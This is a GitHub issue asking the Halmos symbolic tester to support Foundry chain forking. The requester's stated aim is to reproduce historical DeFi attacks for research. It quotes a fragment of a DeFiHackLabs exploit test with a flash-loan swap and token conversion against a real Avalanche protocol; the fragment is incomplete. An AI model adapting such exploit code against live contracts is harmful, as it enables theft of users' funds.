Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Support vm.fork/createSelectFork from foundry #190

Open
whbjzzwjxq opened this issue Aug 25, 2023 · 2 comments
Open

Support vm.fork/createSelectFork from foundry #190

whbjzzwjxq opened this issue Aug 25, 2023 · 2 comments
Labels
enhancement New feature or request

Comments

@whbjzzwjxq
Copy link

Is your feature request related to a problem? Please describe.

vm.createSelectFork(getChain(56).rpcUrl, 26685503);

Got

Warning: setUp() execution encountered an issue at SLOAD: symbolic storage base slot: sha3_296(48454946083833549120556327910798628449690199008091185690930824427871641913341814859890690)
Error: setUp() failed: ValueError: No successful path found in setUp()

Describe the solution you'd like
Allow vm.fork/createSelectFork in function setUp to make the state of the blockchain start with a specific block instead of pure symbolic storage.

Describe alternatives you've considered

Additional context
@whbjzzwjxq whbjzzwjxq added the enhancement New feature or request label Aug 25, 2023
@daejunpark
Copy link
Collaborator

daejunpark commented Aug 25, 2023
edited

https://github.com/a16z/halmos/wiki/FAQ#does-halmos-provide-support-for-mainnet-forking

Could you please provide more context on the use cases that you have in mind?

@whbjzzwjxq
Copy link
Author

@daejunpark
Dear author,
Thanks for your timely reply.
This functionality will help the community to re-produce existing attacks, such as events collected in DeFiHackLabs

In particular, considering the following attack:
Source Link

    function setUp() public {
        cheats.createSelectFork("Avalanche", 23435294);
    }

    function testExploit(FlashLoanAmount: uint256) public{
        MU.approve(address(Router), type(uint).max);
        MUG.approve(address(Router), type(uint).max);
        USDC_e.approve(address(Router), type(uint).max);
        USDC_e.approve(address(Bank), type(uint).max);
        // original code: FlashLoanAmount = MU.balanceOf(address(Pair)) - 1;
        Pair.swap(FlashLoanAmount, 0, address(this), new bytes(1));
        MUGToUSDC_e();
        assert(USDC_e.balanceOf(address(this)) >= 10e8);
        emit log_named_decimal_uint(
            "[End] Attacker USDC.e balance after exploit",
            USDC_e.balanceOf(address(this)),
            6
        );
    }
    function xxx;

As a researcher, I wonder whether Halmos could generate a counter-example to make the attack happen(Re-produce the actual attack). But it will be time-cost to initialize the blockchain state instead of forking it from the blockchain directly.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
enhancement New feature or request
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@daejunpark @whbjzzwjxq